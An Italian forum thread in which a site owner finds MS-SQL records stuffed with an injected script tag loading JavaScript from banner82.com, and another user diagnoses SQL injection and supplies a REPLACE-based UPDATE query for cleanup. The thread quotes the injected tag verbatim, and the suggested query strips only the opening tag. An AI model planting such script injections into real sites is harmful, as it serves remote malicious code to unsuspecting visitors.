MS-SQL Server ripieno di spazzatura

[davsorry]

Buongiorno a tutti,

come se non bastassero le nostre strade anche i database di napoli sono pieni di spazzatura

Ho i record pieni di questa stringa:
<script src=http://www.banner82.com/b.js></script><script src=http://www.banner82.com/b.js></script><script src=http://www.banner82.com/b.js></script><script src=http://www.banner82.com/b.js></script>

Qualcuno conosce la minaccia di cui sono stato vittima?

Ho migliaia di record pieni di immondizia e siccome non mi va di creare un sito di raccolta differenziata all'interno del mio server qualcuno sa darmi una dritta su come eliminare rapidamente le stringhe dannose dalle mie tabelle?

[Habanero]

SQL injection

se ne è già parlato:
http://forum.html.it/forum/showthrea...readid=1244086
http://forum.html.it/forum/showthrea...readid=1242829


prima di ripulire il database devi correggere la vulnerabilità che affligge il tuo sito altrimenti ti troverai a dover rifare lo stesso lavoro la settimana prossima.

[davsorry]

Grazie del consiglio....

Ho visto i due o tre thread in un secondo momento...

Mi tocca fare un lavoro immane a quanto pare.

Inoltre il file log del DB ha raggiunto 31 Gigabyte saturandomi la partizione!

Una volta tolta la vulnerabilità come posso rimuovere quegli script da tutti i miei record, saranno circa 100.000 record per tabella per una ventina di tabelle e su 2 o 3 colonne!

Esiste qualcosa di già bello e fatto

[Habanero]

Dovrebbe essere sufficiente eseguire una UPDATE che elimini la stringa incriminata su ogni tabella...

ad es:

UPDATE tabella1
SET campo1=REPLACE(campo1,'<script src=http://www.banner82.com/b.js>',''),
campo2=REPLACE(campo2,'<script src=http://www.banner82.com/b.js>',''),
campo3=REPLACE(campo3,'<script src=http://www.banner82.com/b.js>','') ;

dove avrai personalizzato il nome della tabella e dei campi.
Se ogni singolo campo contiene più volte la stringa da eliminare, la query SQL va eseguita più volte consecutivamente finchè l'update non aggiorna più nessun record. Ovviamente il tutto va eseguito su ogni tabella.

Prima di procedere ti consiglio caldamente di fare un backup del DB.

[davsorry]

Eh si ci siamo proprio... sto eliminando tabella tabella il payload dell'attacco al DB server.

Grazie di cuore per i suggerimenti sono stati esaustivi ed ho risparmiato un bel po' di tempo.

Buona giornata, Davide

[Habanero]

Ottimo.
Ricordati comunque che la tua priorità dovrebbe essere quella di risolvere la vulnerabilità di sql injection che affligge il tuo sito.

ciao.